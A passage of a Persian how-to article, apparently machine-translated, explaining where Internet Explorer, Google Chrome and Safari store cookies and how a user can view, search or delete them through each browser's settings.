روی عنوان "Name" در لیست محتویات پوشه فایل های موقت اینترنت اکسپلورر که باز می شود کلیک کنید - به این ترتیب می توانید همه کوکی ها را در یک بلوک در یک توده مشترک از فایل های ناهمگن گروه بندی کنید. در اینجا می توانید فایل مورد نظر را پیدا کنید و آن را در یک دفترچه یادداشت استاندارد برای مشاهده یا ویرایش باز کنید.

در گوگل کروم، روی نماد آچار در گوشه سمت راست بالای پنجره کلیک کنید و از منو گزینه Options را انتخاب کنید. مرورگر صفحه «تنظیمات» را باز می‌کند و شما روی پیوند «پیشرفته» در صفحه سمت چپ آن کلیک می‌کنید و در صفحه تنظیمات پیشرفته، روی دکمه «تنظیمات محتوا» کلیک می‌کنید. هنوز نیست صفحه آخردر راه دسترسی به کوکی های ذخیره شده توسط این مرورگر.

در صفحه بعد روی دکمه "همه کوکی ها و داده های سایت" کلیک کنید و در نهایت به لیست کوکی ها دسترسی خواهید داشت.

گوگل کروم امکان جستجو، مشاهده و حذف کوکی ها را فراهم می کند.

در مرورگر سافاری، روی نماد چرخ دنده در سمت راست کلیک کنید گوشه بالاییو خط "تنظیمات ..." را انتخاب کنید. در پنجره تغییر تنظیمات، باید به برگه "امنیت" بروید تا روی دکمه "نمایش کوکی ها" در آنجا کلیک کنید. Safari فقط توابعی را برای جستجو و حذف کوکی ها ارائه می دهد، محتویات این فایل های موقت فقط تا حدی در اینجا قابل مشاهده است.